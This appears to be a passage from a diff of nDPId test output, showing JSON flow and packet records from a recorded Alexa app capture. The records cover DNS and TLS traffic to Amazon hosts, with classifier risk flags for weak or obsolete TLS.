+01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1490976186818,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976186818,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWmJAAEARMzysECrYrBAqASHdADUAQT24ItEBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1490976186879,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976186879,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6vpAAEARopOsECoBrBAq2AA1Id0AUTsIItGBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIgAENu8XXg=="} -00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}} +00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2709,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186884,"flow_last_seen":1490976187167,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1687,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1490976187167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2713,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1490976186884,"flow_last_seen":1490976187172,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4607,"flow_avg_l4_payload_len":418,"midstream":0,"thread_ts_msec":1490976187172,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","server_names":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"159d46e54a2c066ef95e656fdf034e1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=mobileanalytics.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"87:AD:E9:2D:E8:42:F0:5C:3A:09:13:00:12:93:59:04:84:C3:E2:2D"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1490976187242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1490976187242,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmNAAEARM1KsECrYrBAqAeoEADUAKipZJj0BAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2724,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187242,"flow_last_seen":1490976187242,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1490976187242,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1490976187508,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976187508,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6w9AAEARon6sECoBrBAq2AA16gQAUSKUJj2BgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADoACwhwaXRhbmd1acASwC4AAQABAAAAOgAENu8csg=="} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2736,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976187508,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.28.178"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976187511,"flow_last_seen":1490976187511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976187511,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2737,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1490976187511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976187511,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8IbxAAEAG7nasECrYNu8cspdlAbtMyaYzAAAAAKAC\/\/8I0wAAAgQFtAQCCAoA9oePAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2739,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1490976187571,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187571,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3K9AAOcGjI427xyyrBAq2AG7l2UCDLyqTMmmNHASH\/7urAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2742,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1490976187575,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187575,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoIb1AAEAG7omsECrYNu8cspdlAbtMyaY0Agy8q1AQAVc5HgAA"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01705{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2743,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976187511,"flow_last_seen":1490976187577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976187577,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01705{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2747,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976187511,"flow_last_seen":1490976187704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3439,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1490976187704,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 